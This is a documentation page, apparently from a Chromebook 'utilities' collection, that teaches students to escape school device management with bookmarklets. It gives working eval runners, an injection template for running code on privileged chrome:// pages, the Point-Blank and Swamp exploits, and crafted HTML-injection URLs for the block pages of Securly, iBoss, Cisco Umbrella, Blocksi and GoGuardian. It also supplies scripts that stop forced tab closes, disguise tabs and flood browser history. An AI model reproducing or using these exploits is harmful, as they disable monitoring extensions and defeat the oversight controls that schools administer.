Skip to main content

Documentation Index

Fetch the complete documentation index at: https://mintlify.com/S-PScripts/chromebook-utilities/llms.txt

Use this file to discover all available pages before exploring further.

A bookmarklet is simply a browser bookmark whose URL starts with javascript: instead of https://. When clicked, the browser executes the JavaScript code directly on the current page — no extension required. On managed Chromebooks this makes bookmarklets extremely powerful: they can modify the DOM, prevent tab closes, flood history, disguise page titles, and in some cases access privileged Chrome APIs. However, Google patched direct javascript: execution in bookmark URLs on newer versions of ChromeOS (roughly v108 and above), so many of these techniques require staying on an older version or using one of the runner methods described below to work around the restriction.

Creating a Basic Bookmarklet

1

Open the bookmark bar

If the bookmark bar is not visible beneath the address bar, press Ctrl + Shift + B to show it.
2

Right-click the bookmark bar

Select Add Page from the context menu.
3

Enter a name

Type any name you want into the top field — this is only for your reference.
4

Paste the bookmarklet code as the URL

In the URL field, paste the full javascript: code you want to run.
5

Confirm the location

Make sure the save location is set to the Bookmarks bar so it is easily accessible.
6

Press Save

The bookmarklet will now appear on your bookmark bar. Click it on any page to execute the code.
JavaScript bookmarklets were patched in newer versions of ChromeOS — clicking a javascript: bookmark will do nothing on affected versions. To use bookmarklets directly you will need to be on an older ChromeOS version. Use CAUB to prevent automatic updates and stay on a compatible version. If you are already on a newer version, use one of the runner methods below (AdGuard, uBlock, or Sh0vel) to execute bookmarklet code without relying on the native bookmark URL behaviour.

Bookmarklet Runners

The following methods let you run bookmarklet code even when the native javascript: bookmark URL is blocked by policy or patched by ChromeOS.
The AdGuard extension supports User Scripts, which can intercept a keyboard shortcut and evaluate arbitrary JavaScript — effectively recreating bookmarklet execution in MV3.Credits: schoolexploitkid / Titanium Network
1

Install AdGuard

Install the AdGuard AdBlocker extension from the Chrome Web Store.
2

Enable User Scripts

Navigate to chrome://extensions/?id=bgnkhhnnamicmpeenaelnjfhikgbkllg and toggle Enable User Scripts on.
3

Open Extension Options

Click Extension Options on the same page.
4

Go to User Rules

Navigate to the User Rules section in the AdGuard options.
5

Add the runner rule

Add the following rule and click Save:
*#%#window.addEventListener("keyup", event => { if (event.ctrlKey && event.which === 192) { let code = prompt("Eval:"); if (code && code.startsWith("javascript:")) { code = code.substring(11); } if (code) { eval(code); } } });
6

Use it

On any page, press Ctrl + \`` (backtick). A prompt will appear — paste your bookmarklet code (with or without the javascript:` prefix) and press OK.
Sh0vel lets bookmarklets run on almost any URL — including privileged chrome:// pages — by injecting through an existing extension that has the right permissions. It is most powerful when combined with Skiovox Breakout.Credits: Writable, Hannah / Titanium NetworkRequirements: An installed extension that has all of the following in its manifest:
  • tabs permission
  • activeTab permission
  • browserAction or browser_action
  • unsafe-eval in the Content Security Policy
1

Get code execution in an extension

Obtain code execution inside a suitable extension — via Point-Blank, Skiovox Breakout, RigTools, XSS, DNS spoofing, or another method. Verify the extension has the permissions listed above by checking chrome-extension://EXTENSION_ID/manifest.json.
2

Enable the chrome-urls flag

Navigate to chrome://flags and enable the #extensions-on-chrome-urls flag, then restart.
3

Inject the bookmarklet via browserAction

Place your bookmarklet inside the following template and make the extension execute it:
chrome.browserAction.onClicked.addListener(() => {
  chrome.tabs.executeScript(null, {
    code: `location.href="javascript:YOUR_BOOKMARKLET_CODE_HERE";`
  });
});
For example, to run the blank3r bookmarklet on chrome://extensions:
chrome.browserAction.onClicked.addListener(() => {
  chrome.tabs.executeScript(null, {
    code: `let link=window.open('about:blank','_blank');link.location.href="javascript:let shim = false;var ids = prompt('extension ids (comma separated)').split(',');setInterval(()=>{ids.forEach((id)=> opener.chrome.developerPrivate.updateExtensionConfiguration({extensionId: id, fileAccess: shim}));shim = !shim;}, 250);";`
  });
});
4

Open the target URL

Navigate to the page you want the bookmarklet to run on (e.g. chrome://extensions).
5

Open SWAs as a normal tab (if needed)

If you want to run code on a System Web App such as chrome://os-settings, use the following snippet to open it as a regular tab first:
chrome.tabs.create({}, () => {
  chrome.tabs.update(null, { url: "chrome://file-manager" });
});
6

Click the extension icon

Click the extension icon in the toolbar. If done correctly, your bookmarklet will execute on the target page.
Point-Blank lets you run bookmarklets on privileged chrome:// pages by exploiting a window opener relationship. Bookmarklets must not be blocked by policy for this to work.Credits: https://blog.bypassi.com/_/point-blank/
1

Navigate to the reset page

Go to chrome://settings/resetProfileSettings.
2

Click Current Settings

A new tab or window will open from the settings page, creating an opener relationship.
3

Run a bookmarklet

On the newly opened page, run the following as a bookmarklet:
javascript:opener.alert()
4

Profit

You are now executing code in the context of the chrome://settings tab using only a bookmarklet.
Swamp is an updated version of Point-Blank that remained unpatched on ChromeOS versions up to v107. It functions similarly to LTBEEF and can disable force-installed extensions, run bookmarklets on any page, and execute custom code with broad Chrome API access.Credits: 3kh0/ext-remover / Titanium NetworkCapabilities:
  • Disable force-installed extensions (similarly to LTBEEF) even on Chrome 107
  • Run bookmarklets on any page even when they are blocked by policy
  • Break extensions until a powerwash (or until you choose to re-enable them)
  • Run a custom DNS to block network requests without being on a real DNS
  • Run custom code with access to most of the Chrome API
1

Bookmark the Swamp script

Bookmark the code at: https://raw.githubusercontent.com/3kh0/ext-remover/main/newpointblank.js
2

Go to your blocker extension's block page

Open the link that matches your school’s blocking extension:Securly:
chrome-extension://iheobagjkfklnlikgihanlhcddjoihkg/blocked.html?category=PGEgaHJlZj0iYWJvdXQ6YmxhbmsiIHRhcmdldD0iX2JsYW5rIiByZWw9Im9wZW5lciIgc3R5bGU9IiBiYWNrZ3JvdW5kOiB3aGl0ZTsgY29sb3I6IGJsYWNrOyBkaXNwbGF5OiBibG9jazsgaGVpZ2h0OiAzODBweDsgdHJhbnNmb3JtOiBzY2FsZSgyLjUpOyBkaXNwbGF5OiBmbGV4OyBqdXN0aWZ5LWNvbnRlbnQ6IGNlbnRlcjsgYWxpZ24taXRlbXM6IGNlbnRlcjsgIj48ZGl2PkNsaWNrIE1lPC9kaXY+IDwvYT4=
iBoss:
chrome-extension://kmffehbidlalibfeklaefnckpidbodff/restricted.html?re=1&bc=%3Ca+href=%22about:blank%22%20rel=%22opener%22%20target=%22_blank%22%3Ehi%3C/a%3E
Cisco Umbrella:
chrome-extension://jcdhmojfecjfmbdpchihbeilohgnbdci/debug.html?error=%3Ca%20href%3D%22about:blank%22%20rel%3D%22opener%22%20target%3D%22_blank%22%3Ehey%3C/a%3E
Blocksi:
chrome-extension://ghlpmldmjjhmdgmneoaibbegkjjbonbk/pages/blockPage.html?blockurl={%22hostname%22:%22%3Ca%20href=%27//%27%20rel=%27opener%27%20target=%27_blank%27%3Etest%3C/a%3E%22}
GoGuardian:
chrome-extension://haldlgldplgnggkjaafhelgiaglafanh/teacher/lesson-plans/blocked.html?cs=[1,{%22name%22:%22%3Ca%20href=%27about:blank%27%20rel=%27opener%27%20target=%27_blank%27%3ECLICK%20ME%3C/a%3E%22}]
3

Click the blue link on the block page

Each page will have a blue link. Click it — it should open a blank page.
4

Click the Swamp bookmarklet

On the blank page, click the bookmarklet you saved in Step 1.
5

Choose disable mode

Click Hard disable (permanent until powerwash) or Soft disable (until restart). Soft disable is recommended.
Securly has patched this exploit for newer versions of its extension. If it does not work, try the alternate Securly link (extension ID joflmkccibkooplaeoinecjbmdebglab). GoGuardian may also have patched this in newer extension versions.

Useful Bookmarklets

Once you have a way to run bookmarklet code, the following scripts provide practical functionality on managed Chromebooks.

Anti Tab Close (GoGuardian)

Prevents your tab from being force-closed — an exploit that has existed since 2017/2018. Run on any tab you want to protect. 
javascript: onbeforeunload = (i) => 1;
Compact variant: 
javascript:onbeforeunload=i=>1
Credits: Titanium Network, theskid22, Arsun

Tab Disguiser

Changes the page title and favicon so the tab looks like a Google Drive page to a passing observer. You can customise the favicon URL and title text to impersonate any site. Option 1 — Single change: 
javascript: (function () {
  var link =
    document.querySelector("link[rel*='icon']") ||
    document.createElement("link");
  link.type = "image/x-icon";
  link.rel = "shortcut icon";
  link.href =
    "https://ssl.gstatic.com/docs/doclist/images/infinite_arrow_favicon_5.ico";
  document.title = "My Drive - Google Drive";
  console.log(document.title);
  document.getElementsByTagName("head")[0].appendChild(link);
})();
Option 2 — Updates every second (more persistent): 
javascript: function gcloak() {
  var link =
    document.querySelector("link[rel*='icon']") ||
    document.createElement("link");
  link.type = "image/x-icon";
  link.rel = "shortcut icon";
  link.href =
    "https://ssl.gstatic.com/docs/doclist/images/infinite_arrow_favicon_5.ico";
  document.title = "My Drive - Google Drive";
  document.getElementsByTagName("head")[0].appendChild(link);
}
gcloak();
setInterval(gcloak, 1000);
To customise: replace the link.href value with your own image URL, replace the title string, and adjust the interval (in milliseconds) as needed. Credits: Titanium Network
The Tab Disguiser requires the ability to use javascript: in bookmarks. It was patched in newer versions of ChromeOS.

History Flooder

Floods your browsing history with the current page’s URL a specified number of times, making it harder to find specific entries. Run on any page.
Entering too large a number will crash Chrome. Chrome history on ChromeOS is retained for approximately 3 months.
javascript:var num=prompt("How many times do you want this page to show up in your history?");done=false;x=window.location.href;for (var i=1; i<=num; i++){history.pushState(0, 0, i==num?x:i.toString());if(i==num){done=true}}if(done===true){alert("Flooding successful!\n "+window.location.href+" \nis now in your history "+num+(num==1?" time.":" Times. "))}
Credits: BlazerHM
Patched in newer versions of ChromeOS — javascript: was patched in bookmarks.

Change Background (Any Version)

Cycles the managed background through generic colours using the ASH debugging shortcuts flag. Not very practical but demonstrates policy override capability.
1

Enable the flag

Go to chrome://flags and enable the ASH debugging shortcuts flag, then restart.
2

Cycle the background

Press Ctrl + Alt + B to cycle through generic colour backgrounds.
Credits: Scutoid (github.com/Inlnx)

Change Wallpaper (v99–v104 Only)

Overrides the policy-enforced wallpaper on ChromeOS v99 through v104 by exploiting the Personalization Hub UI flag.
1

Enable the Personalization Hub flag

Go to chrome://flags, search for Personalization, and enable Personalization Hub UI, then restart.
2

Open wallpaper settings

Right-click the desktop and click Personalize, or find Personalize your device in Settings.
3

Select a non-My Images category

Go to Wallpaper and select any category other than My Images (e.g. Cityscapes, Heritage).
4

Click Change Daily

It will throw an error, but it changes the wallpaper anyway.
5

Go back and select your image

Return to the main Wallpaper menu, go to My Images, and select the image you want.
You must repeat steps 2–5 every time you restart. This exploit is version-specific (v99–v104) and may not work on all devices within that range.
Credits: CVFD / Titanium Network

Build docs developers (and LLMs) love

Get started for freeTalk to us